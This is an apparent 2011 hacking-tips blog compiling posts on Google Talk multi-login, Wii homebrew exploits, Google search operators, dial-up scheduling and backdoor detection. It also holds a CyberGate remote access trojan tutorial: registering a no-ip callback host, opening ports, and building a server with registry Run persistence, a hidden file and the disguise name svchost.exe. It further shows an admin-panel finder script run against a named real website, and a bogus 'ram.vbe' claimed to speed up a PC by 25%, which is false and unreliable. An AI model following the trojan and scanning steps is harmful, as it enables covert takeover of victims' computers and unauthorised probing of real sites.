Minggu, 27 November 2011

Multi Google Talk Login without any software

Just follow the simple steps Below:
1) Right click on the Google Talk shortcut.
2) click on Properties.
3) Go to Shortcut tab on Google Talk Properties window.
4) On the Target textbox, add in the /nomutex to the end of the line so that it looks like below (or you can simply copy and paste the below syntax and replace the original).
“c:\program files\google\google talk\googletalk.exe” /nomutex
5) Click on OK.
I didn't have to do anything after this and clicking on the shortcut multiple times just gave me different Google talk window.


Alternative

To create a new shortcut for Google Talk:

1) Right-click on the desktop or anywhere you want to place the GTalk shortcut.
2) Select New on the right click context menu.
3) Then select Shortcut.
4) Copy and paste the following line to the text box when prompted to type the location of the item:
“c:\program files\google\google talk\googletalk.exe” /nomutex

5) Click on Next.
6) Give the shortcut a proper name such as Google Talk or Google
Talk Multiple or Google Talk Polygamy.
7) Click OK until you are done.

tutorial Homebrew Channel for Nintendo Wii

This is a step-by-step guide of how to install the Homebrew Channel on your Wii console. The method described in this tutorial is based on Smash Stack, Yu-Gi-OWNED!, Bathaxx, Return of the Jodi,and Indiana Pwns exploits, as these are the only methods working for 4.3; other methods of installing the Homebrew Channel for users with older System Menus are bannerbomb and Twilight Hack.

This tutorial applies to versions of the Wii System Menu ranging from 3.0 to 4.3. Only NTSC-U, NTSC-J, and PAL Wiis are supported by these exploits. For Korean Wiis, you cannot install HBC on 4.3, and for lower System Menus you should use bannerbomb. The latest version of Wii System Menu is 4.3, therefore, this method should work for ALL USA, Japanese, and PAL Wiis.

Smash Stack requires a copy of Super Smash Bros Brawl, and will only work for NTSC-U, NTSC-J and PAL Wiis. Indiana Pwns requires a copy of Lego Indiana Jones: The Original Adventures, and will work for NTSC-U, NTSC-J and PAL Wiis. Yu-Gi-OWNED! requires a copy of Yu-Gi-Oh 5D's Wheelie Breakers, it will only work on PAL Wiis. For NTSC-U and NTSC-J use Yu-Gi-Vah. Bathaxx requires a copy of LEGO Batman, and will work for NTSC-U, NTSC-J and PAL Wiis. Return of the Jodi requires a copy of the original Lego Star Wars game or the newer (1.01) release (NTSC or PAL). Eri HaKawai requires a copy of Tales of Symphonia: Dawn of the New World, and will work for NTSC-U, NTSC-J and PAL Wiis.

About the Homebrew Channel

The Homebrew Channel is a self-updating application created by Team Twiizers, which allows users to easily load and use homebrew applications, without having to use exploits such as Bannerbomb or Twilight Hack every they run a new application. After installation, the channel is accessible from the Wii Menu just like any other Wii channel. The channel can be deleted at any through the Wii's "Data Management" menu. The Homebrew Channel does not show up in the console's play logs, however this does not affect the Wii in any way whatsoever.

Setting up Homebrew Channel
What is needed

A Wii console
An SD card (Check to see if yours is compatible)

Note: SDHC cards are not compatible with the Smash Stack exploit. You must have an SD card that is 2GB or less.

The HackMii installer
The Indiana Pwns exploit, Yu-Gi-OWNED! exploit, Bathaxx exploit, Return of the Jodi exploit, or Smash Stack exploit
A computer (Windows, Linux, or MacOS)
And SD card reader for your computer

Part 1: Preparing the SD Card

(Smash Stack only): If you have any custom stages saved on the Wii (including the default ones), move them to the SD card or delete them. Then rename your private folder to privateold.

If you already have an SD card that is compatible with your Wii, you may be able to put all necessary files alongside the already existing files on your SD card given you have enough room. The Wii directory is called private, and you need to use a folder called private containing Indiana Pwns, Yu-Gi-OWNED!, Bathaxx, Return of the Jodi or Smash Stack to trick your Wii into thinking that it made the file these exploits use.

If you would like, you may rename your current private directory to any name. (I renamed mine privateold) Therefore, when you are finished with the hack, you can delete all hack files and rename privateold back to private to access all of your files again.

If you already have a compatible SD Card that has already been used in your Wii with a renamed private directory, you DO NOT have to format your SD card. Skip to the next step.

If you have a new SD card, or an SD card with no Wii files, it is recommended that you format it using the instructions below.

Important! This process will erase the data on the card and it is therefore recommended that you make a back-up copy of any data you may currently have on your SD card before continuing.
Windows
Format.jpg

Open up My Computer.
Right-click on the drive that contains the SD card and select Format....
Under File system make sure you select FAT
Click "Start" and let the process finalize.
After the formatting is finished proceed to the next step.

Mac OS

Open up Disk Utility
Find your SD card in the navigation.
Go to the Erase tab.
Change the Volume Format to MS-DOS (FAT).
Click "Erase" and let the process finalize.
After the formatting is finished proceed to the next step.

Linux

Open up a terminal.
Execute the command "mkfs.vfat /dev/<location of your SD card>".
Caution not to reformat your hard disk. Think hard before formatting /dev/sda1, for example.
After the formatting is finished proceed to the next step.

Part 2: Copying files to SD card

Ensure that the SD card slider is not in the Lock position.
Download Indiana Pwns, Yu-Gi-OWNED!, Bathaxx, Return of the Jodi or Smash Stack (make sure you have the correct version for your Wii System Menu) and the HackMii installer.
Extract both the exploit and HackMii installer in an easily accessible folder, such as your Desktop.
Open up the folder called hackmii_installer_X ( where X relates to your version)
Copy file boot.elfB to your SD card (pic. 3).
Finally, from the exploit archive, copy the folder called private to your SD card. Your SD card should look like pic. 4.

Contents That Should Be On Your SD Card:

private - Extracted From Indiana Pwns, Yu-Gi-OWNED!, Bathaxx, Return of the Jodi or Smash Stack
boot.elf - Extracted From The Hackmii Installer
(optional) privateold - The Wii's existing files renamed temporarily. (see "Preparing the SD Card")

Part 3: Setting up your Wii

In order to install the Homebrew Channel, you must first use an exploit of some kind. Use the chart below to determine what you will need to use:
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Indiana Pwns

Make sure you have booted Lego Indiana Jones at least once. Otherwise, the hacked save won't copy
Turn on the Wii, and go to Settings>Data Management>Saves>SD and find the Indiana Pwns save for your region and copy it to the Wii
Return to the System Menu
Boot Lego Indiana Jones
Load the saved game you just copied to the Wii.
When the game loads, you will be in Barnett College. Walk to the Art Room (through the Courtyard), approach the left character on the podium. When it zooms on him, choose the switch to option (two silhouettes, staggered, with an arrow pointing between them).
boot.elf from your SD card should now load

Smash Stack

Before inserting your SD card, boot the game and go to the stage builder and make sure to erase all the custom sample stages.

Insert SD card into Wii
Boot Super Smash Bros Brawl
Go to the Stage Creator
boot.elf from your SD card should now load

Yu-Gi-OWNED!

Make sure you have booted Yu-Gi-Oh 5D's Wheelie Breakers at least once. Otherwise, the hacked save won't copy.
Put your SD Card in your Wii.
Go into Wii Options -> Data Management -> Save Data -> Wii.
Go to the SD Card and move the Yu-Gi-OWNED! save to your Wii.
Boot Yu-Gi-OH 5D's Wheelie Breakers.
Press Wiimote A Button and wait until the title menu shows up.
Press Wiimote A Button and you will see a loading screen. Wait a couple of seconds and your homebrew will be executed.

Bathaxx

Make sure you have booted LEGO Batman at least once. Otherwise, the hacked save won't copy
Turn on the Wii, and go to Settings>Data Management>Saves>SD and find the Bathaxx save for your region and copy it to the Wii
Return to the System Menu
Boot LEGO Batman
Load the saved game you just copied to the Wii.
When the game loads, you will be in the batcave, take the elevator on the right side. Then in the trophy room, go to the upper corner and go through the door in order to enter the "Wayne Manor". Now you can select a character. Choose the last enabled one in the lowest row.
boot.elf from your SD card should now load

Return of the Jodi

Make sure you have booted Lego Star Wars at least once. Otherwise, the hacked save won't copy
Turn on the Wii, and go to Settings>Data Management>Saves>SD and find the Return of the Jodi save for your region and copy it to the Wii
Return to the System Menu
Boot Lego Star Wars
Load the saved game you just copied to the Wii.
boot.elf from your SD card should now load

Eri Hakawai

Make sure you have booted Tales of Symphonia at least once. Otherwise, the hacked save won't copy
Turn on the Wii, and go to Settings>Data Management>Saves>SD and find the Eri HaKawai save for your region and copy it to the Wii
Return to the System Menu
Start the game and load the first save
Press the PLUS button to enter the game menu
Scroll to the STATUS button and press A
Scroll to the monster named "Eri HaKawai" (NTSC version: "Giantpune") and press A
boot.elf from your SD card should now load

Part 4: Installing the Homebrew Channel

You will be presented with one of the screens below; if you have a new Wii you will only be able to install BootMii as IOS.
Select continue.
Go to Homebrew Channel > Install the Homebrew Channel. You will be asked whether you want to install the channel; select yes. After installation you should get a message "finished" and return you to the initial menu.
If possible, install BootMii as boot2; if not install it as an IOS.
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Running Bootmii Through HBC

If you're one of the late-comers to the Wii party you may have had to install BootMii via IOS. In that case you have to run BootMii by going into The HBC and hit the "Home" button on your Wii Remote. Place your cursor onto the "Launch BootMii" selection and press A.


Extra Note
While in BootMii, you should back up your NAND memory. This is mainly for those who have installed bootmii as Boot2, but should still be done when installed as IOS. When in BootMii, you will not have access to the wii-mote, so you will have to use a gamecube controller, or the buttons on the Wii itself. (power button is move cursor, reset button is select option.) THIS ONLY APPLIES TO THE BOOTMII APPLICATION ITSELF, THE HACKMII INSTALLER DOES SUPPORT THE WIIMOTE.
Select the 4th option then hit A/Reset, then you are taken to a new option.
The first corresponds to the backing up of NAND memory, the second; "injecting" NAND back into memory...
Select the first option (you must have at least 512MB of space on SD card to do so) to back up NAND


I reccommend using "Letterbomb Exploit" for all WIIs using Sys.Menu 4.3 as it doesn't require you to have a gamedisk.

I have my wii setup to play burnt games and games on an external HDD. i will post a tutorial on installing the required ios's for CFG UsB Loader as well.

Enjoy your newly HACKED wii, as its now able to do ALOT MORE (like play movies and music, etc)

Find Admin Panel Full Tut + Script


This Perl Script can find the Admin panel of an site


Downoad this Perl Script here --> http://sites.google.com/site/ireally.../adminpanel.pl Go to Run --> CMD


C:\Users\Administrator>cd\

C:\>cd perl

C:\Perl>cd bin

C:\Perl\bin>perl adminpanel.pl Quote: ~ Enter Site
* ex: www.target.com or www.target.com/path
-> www.qesco.com.pk

~ Enter site source code
* ex: asp, php, cfm
-> asp

->Target: http://www.qesco.com.pk/
->Site source code: asp
->Searching admin control panel...


[+] Found -> http://www.qesco.com.pk/admin/

How to detect a backdoor on a tool

1)Right click on the any suspicious tool and if you have winrar installed and if it shows "open with winrar" then this means it was binded with winrar so that tool is backdoored.


2) open it with a resource editor such as resource hacker/restorator/pe explorer and check the rcdata section,if theres 1 & 2 entries in it
then its binded.


3) open it with a hex editor , at the start of a PE header theres always this line "This program cannot be run in DOS mode" , search for it,if it
exists more then once then it might be binded
it depends on the specific app,for example its not unusual for
binders/crypters to have the stub file attached in the resources
also search for .exe and inspect the results,a binded file
drops the files to a temp folder before executing em , so if
you find somethin like this: %.t.e.m.p.%.\.x.x...e.x.e or file1.exe/file2.exe
then its binded.


4) run it in sandboxie ,when a file is executed in sandboxie its isolated (cant access your files/registry, first click the sandboxie tray icon to
open up its Window , then right click the file and click "run with sandboxie"
if you see another process name in the sandboxie Window then its probably backdoored (this doesnt include sandboxie rpcss/dcom launch processes,those are legit and needed for some programs) .

google tips,trik and hacks

1. The best way to begin searching harder with Google is by clicking the Advanced Search link.
2. This lets you search for exact phrases, "all these words", or one of the specified keywords by entering search terms into the appropriate box.
3. You can also define how many results you want on the page, what language and what file type you're looking for, all with menus.
4. Advanced Search lets you type in a Top Level Domain (like .co.uk) in the "Search within site of domain" box to restrict results.
5. And you can click the "Date, usage rights, numeric range and more" link to access more advanced features.
6. Save time – most of these advanced features are also available in Google's front page search box, as command line parameters.
7. Google's main search invisibly combines search terms with the Boolean construct "AND". When you enter smoke fire – it looks for smoke AND fire.
8. To make Google search for smoke or fire, just type smoke OR fire
9. Instead of OR you can type the | symbol, like this: smoke | fire
10. Boolean connectors like AND and OR are case sensitive. They must be upper case.
11. Search for a specific term, then one keyword OR another by grouping them with parentheses, like this: water (smoke OR fire)
12. To look for phrases, put them in quotes: "there's no smoke without fire"
13. Synonym search looks for words that mean similar things. Use the tilde symbol before your keyword, like this: ~eggplant
14. Exclude specific key words with the minus operator. new pram -ebay excludes all results from eBay.
15. Common words, like I, and, then and if are ignored by Google. These are called "stop words".
16. The plus operator makes sure stop words are included. Like: fish +and chips
17. If a stop word is included in a phrase between quote marks as a phrase, the word is searched for.
18. You can also ask Google to fill in a blank. Try: Christopher Columbus discovered *
19. Search for a numerical range using the numrange operator. For example, search for Sony TV between £300 and £500 with the string Sony TV £300..£500
20. Google recognises 13 main file types through advanced search, including all Microsoft Office Document types, Lotus, PostScript, Shockwave Flash and plain text files.
21. Search for any filetype directly using the modifier filetype:[filetype extension]. For example: soccer filetypedf
22. Exclude entire file types, using the same Boolean syntax we used to exclude key words earlier: rugby -filetype:doc
23, In fact, you can combine any Boolean search operators, as long as your syntax is correct. An example: "sausage and mash" -onions filetype:doc
24. Google has some very powerful, hidden search parameters, too. For example "intitle" only searches page titles. Try intitle:herbs
25. If you're looking for files rather than pages – give index of as the intitle: parameter. It helps you find web and FTP directories.
26. The modifier inurl only searches the web address of a page: give inurl:spices a go.
27. Find live webcams by searching for: inurl:view/view.shtml
28. The modifier inanchor is very specific, only finding results in text used in page links.
29. Want to know how many links there are to a site? Try link:sitename – for example link:www.mozilla.org
30. Similarly, you can find pages that Google thinks are related in content, using the related: modifier. Use it like this: related:www.microsoft.com
31. The modifier info:site_name returns information about the specified page.
32. Alternatively, do a normal search then click the "Similar Pages" link next to a result.
33. Specify a site to search with the site: modifier – like this: search tips site:www.techradar.com
34. The above tip works with directory sites like www.dmoz.org and dynamically generated sites.
35. Access Google Directory – a database of handpicked and rated sites – at directory.google.com
36. The Boolean operators intitle and inurl work in Google directory, as does OR.
37. Use the site: modifier when searching Google Images, at images.google.com. For example: dvd recorder site:www.amazon.co.uk
38. Similar, using "site:.com" will only return results from .com domains.
39. Google News (news.google.com) has its own Boolean parameters. For example "intext" pulls terms from the body of a story.
40. If you use the operator "source:" in Google News, you can pick specific archives. For example: heather mills source:daily_mail
41. Using the "location:" filter enables you to return news from a chosen country. location:uk for example.
42. Similarly, Google Blogsearch (blogsearch.google.com) has its own syntax. You can search for a blog title, for example, using inblogtitle:
43. The general search engine can get very specific indeed. Try movie: to look for movie reviews.
44. The modifier film: works just as well!
45. Enter showtimes and Google will prompt you for your postcode. Enter it and it'll tell you when and where local films are showing.
46. For a dedicated film search page, go to www.google.co.uk/movies
47. If you ticked "Remember this Location" when you searched for show times, the next time you can enter the name of a current film instead.
48. Google really likes movies. Try typing director: The Dark Knight into the main search box.
49. For cast lists, try cast: name_of_film
50. The modifier music: followed by a band, song or album returns music reviews.
51. Try searching for weather London – you'll get a full 4-day forecast.
52. There's also a built-in dictionary. Try define: in the search box.
53. Google stores the content of old sites. You can search this cache direct with the syntax keyword cache:site_url
54. Alternatively, enter cache:site_url into Google's search box to be taken direct to the stored site.
55. No calculator handy? Use Google's built in features. Try typing 12*15 and hitting "Google Search".
56. Google's calculator converts measurements and understands natural language. Type in 14 stones in kilos, for example.
57. It does currency conversion too. Try 200 pounds in euros
58. If you know the currency code you can type 200 GBP in EUR instead for more reliable results.
59. And temperature! Just type: 98 f to c to convert Fahrenheit to Centigrade.
60. Want to know how clever Google really is? Type 2476 in roman numerals, then hit "Google Search"...
61. You can personalise your Google experience by creating a Google account. Go to www.google.com/account/ then click "Create Account".
62. With a Google account there are lots more extras available. You'll get a free Gmail email account for one...
63. With your Google account, you can also personalise your front page. Click "iGoogle" to add blog and site feeds.
64. Click "Add a Tab" in iGoogle to add custom tabs. Google automatically populates them with suitable site suggestions.
65. iGoogle allows you to theme your page too. Click "Select Theme" to change the default look.
66. Some iGoogle themes change with time..."Sweet Dreams" is a theme that turns from day to night as you browse.
67. Click "More" under "Try something new" to access a full list of Google sites and new features.
68. "Custom Search" enables you to create a branded Google search for your own site.
69. An active, useful service missing from the list is "Personalised Search" – but you can access it via www.google.com/psearch when you're logged in.
70. This page lists searches you have recently made – and is divided into categories. Clicking "pause" stops Google from recording your history.
71. Click "Trends" to see the sites you visit most, the terms you enter most often and links you've clicked on!
72. Personalised Search also includes a bookmark facility – which enables you to save bookmarks online and access them from anywhere.
73. You can add bookmarks or access your bookmarks using the iGoogle Bookmarks gadget.
74. Did you know you can search within your returned results? Scroll down to the bottom of the search results page to find the link.
75. Search locally by appending your postcode to the end of query. For example Indian food BA1 2BW finds restaurants in Bath, with addresses and phone numbers!
76. Looking for a map? Just add map to the end of your query, like this: Leeds map
77. Google finds images just as easily and lists them at the top, when you add image to the end of your search.
78. Google Image Search recognises faces... add &imgtype=face to the end of the returned URL in the location bar, then hit enter to filter out pictures that aren't people.
79. Keeping an eye on stocks? Type stocks: followed by market ticker for the company and Google returns the data from Google Finance.
80. Enter the carrier and flight number in Google's main search box to return flight tracking information.
81. What time is it? Find out anywhere by typing time then the name of a place.
82. You may have noticed Google suggests alternate spellings for search terms – that's the built in spell checker!
83. You can invoke the spell checker directly by using spell: followed by your keyword.
84. Click "I'm Feeling Lucky" to be taken straight to the first page Google finds for your keyword.
85. Enter a statistics-based query like population of Britain into Google, and it will show you the answer at the top of its results.
86. If your search has none-English results, click "Translate this Page" to see it in English.
87. You can search foreign sites specifically by clicking "Language Tools", then choosing which countries sites to translate your query to.
88. Other features on the language tools page include a translator for blocks of text you can type or cut and paste.
89. There's also a box that you can enter a direct URL into, translating to the chosen language.
90. Near the language tools link, you'll see the "Search Preferences". This handy page is full of secret functionality.
91. You can specify which languages Google returns results in, ticking as many (or few) boxes as you like.
92. Google's Safe Search protects you from explicit sexual content. You can choose to filter results more stringently or switch it off completely.
93. Google's default of 10 results a page can be increased to up to 100 in Search Preferences, too.
94. You can also set Google to open your search results in a new window.
95. Want to see what others are searching for or improve your page rank? Go to www.google.com/zeitgeist
96. Another useful, experimental search can be found at www.google.com/trends – where you can find the hottest search terms.
97. To compare the performance of two or more terms, enter them into the trends search box separated by commas.
98. Fancy searching Google in Klingon? Go to www.google.com/intl/xx-klingon
99. Perhaps the Swedish chef from the muppets is your role model instead? Check www.google.com/intl/xx-bork
100. Type answer to life, the universe and everything into Google. You may be surprised by the result...
101. It will also tell you the number of horns on a unicorn

Sabtu, 26 November 2011

procedur to autoconnect internet

Using this trick a specified network can be autoconnected at specified time using batch file

Creating autoconnect batch file

STEP 1: Open a notepad, paste

rasdial <connection name> <Username> <password>

eg.if ur user name is abc,connection name is network and password is 12345 then it will be

rasdial network abc 12345

step:2
Name the file as connect and change the extention from .txt to .bat and Make a new folder in C:/ drive and keep the batch file in the folder


Scheduling Automatic Connection Using These Batch Files

Here we can schedule automatic connection to broadband using the inbuilt Windows Task Scheduler. Here is how to do it.



1. Open control panel=>Scheduled Task. Add scheduled Task. This will open ***8216;Scheduled Task Wizard***8217;. Here you will see a list of programs which you can schedule. Click ***8216;Browse***8217; and go to the folder where you saved ***8216;connect.bat***8217; and select it.

2. Give the task, a name say, connect1 and set the frequency say ***8216;daily***8217; and click next.

3. Select the start time and start date. Start date will be today and set the start time to the time you get unlimited downloads.

4. In the next step it will ask for you computer user name and password. If you have single user computer, this field will be filled already ,so click next.

5. Tick ***8216;Open advanced properties for task when I click finish***8217; and click next.

NOTE:The scheduling procedure differs with respect to the os

tats it!!!!! u have done a great job!!!!!

speed up your computer!!

Well now you don't have to download any software or any other application to make your computer any faster , you are going to create your own application or its fine to say a script which will Speed up your computer by 25% and yes, you can feel the result instantly on you pc. So just follow out this easy steps..

First open you notepad and just copy/paste this below code their
Code:
mystring=(80000000)
Now save this notepad like " ram.vbe " ( without quote )

Now click on " ram.vbe " and you are done, you can realize the Boost Instantly

This trick is personally checked by me and found 25% Increase In Pc Speed

If you don't believe than just use any Pc performance checker and get it believe me

Thats it, when ever you turn on your pc , you just click this Script and your PC will run smooth through out the Shut down. And if you find any problems
Then just tell me in the comments..

cybergate tutorial

1. Go here: http://www.no-ip.com/newUser.php to create your own account
2. Once you have created your account, log in.
3. Now go to "Add a host"
4. In hostname box insert whatever u want (I've choose razerzje.zapto.org) (you have to remember this!!)
5. Click Create host to confirm
6. Once you've created the host, download the free software no-ip duc
7. Install the software and login with your email and password.
8. Click on your host to update it.
9. Leave the software OPENED

Ok, now you have to port-forwarding

ROUTER:

1. Choose a port for your cybergate server put whatever you want.. E.g: 3840
2. Go on START - Run , write cmd and then ipconfig
3. Now copy the IP address near Gateway
4. Put in on your browser.
5. In my router, I just have to go on virtual server and insert the port..
6. If you can't find the function to unlock the port go on http://portforward.com/ and search for your router

WINDOWS FIREWALL:

1. Go on start - control panel - windows firewall
2. Go on "Exceptions"
3. Click add port: In name put cybergate1, in port put the port that you have choose.. (I've choose 999) and click TCP
4. Repeat 3 step but put cybergate2 as name, UDP and save all.


Oooook dude, now you have to set up your own Cybergate Server!!


Now, extract and open Cybergate.exe

Now:

Read the rules and click I Agree

Now follow these steps:

1. Click Control Center and select START
2. Now will appear a windows called "Select listening ports"
3. Put the port that you have choose and click the arrow
4. Set the connections limit to 10.000
5. On password put whatever you want (Remember it) [b]
6. Click save
7. Click on Control Center - Builder - Create server
8. Choose new and put in ur profile name
9. Select it and click Forward
10. Now select 127.0.0.1 and click DELETE
11. Click add
12. Insert 127.0.0.1ort that you have choosed.. Ex: 127.0.0.1:3746 and save
13. Re-click add, insert your hostname that you have choosed on no-ip and the port.. Ex: no-ip.biz:999 and save
14. [b] Now on the right, leave identification as "remote" but on password put the same password that you have putted on "Select listening ports"
15. Now go on "Installation"
16. Check the following: System
HKEY_LOCAL_MACHINE\Software\.....\Run
HKEY_CURRENT_USER\Software\.....\Run
Persistance
Hide file
Change creation date
17. On active setup click 4-5 times Random button
18. Remove the check on "Melt file"
19. On Mutex click random 4-5 times.-
20. On directory put the directory where the server will be installed
21. On filename put the file name of the server.. (I putted svchost.exe)
22. Go on create server, and click Create Server and save it!


Finished!

Now you have your server!!


P.S: No-ip must be opened in order to execute cybergate.. or the server will not work..

Rabu, 23 November 2011

Windows Disabling Startup Programs

Use the System Configuration Utility to safely turn off programs that start-up through the Windows Registry.
Windows 7/Vista:

Press Start. Type msconfig into the search bar and press Enter.
Windows XP:

Go to Start > Run.

Type msconfig and press Enter.
The General tab helps diagnose if the problems encountered are with drivers, services, or startup items by unchecking the appropriate boxes and restarting. The Startup tab allows you to individual disable or re-enable startup items
Any program you want to disable, uncheck it Apply ok and just restart your pc